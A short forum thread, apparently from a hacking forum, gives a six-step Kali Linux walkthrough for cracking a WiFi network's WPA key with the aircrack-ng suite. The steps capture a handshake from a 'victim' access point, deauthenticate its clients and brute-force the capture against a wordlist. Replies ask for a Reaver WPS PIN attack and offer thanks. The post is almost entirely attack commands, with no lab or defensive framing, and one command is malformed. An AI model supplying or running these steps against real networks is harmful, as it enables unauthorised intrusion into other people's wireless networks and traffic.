OS Kali Linux
Brute Force Attack !
Step 1:
#ifconfig
Step 2:
#airmon-ng start wlan0
Step 3:
#airodump-ng mon0 (or wlan0)
Step 4: Handshake
#airodump-ng -c (fill the channel) --bssid (Macaddress of the victim) -w (example: "/root/Desktop/ mon0
Step 5:
#aireplay-ng -0 2 -a (BSSID) -c (station) mon0
Step6:
#aircrack-ng -a2 -b (BSSID) -w (WordList Dir) (cap file)
Wifi Brute Force Attack
- Velli aslan
- Posts: 9
- Joined: Fri Dec 08, 2017 5:21 am
Re: Wifi Brute Force Attack
Bro show other method with Kali Linux and Reaver to brute force router PIN
Re: Wifi Brute Force Attack
thanks bro very helpful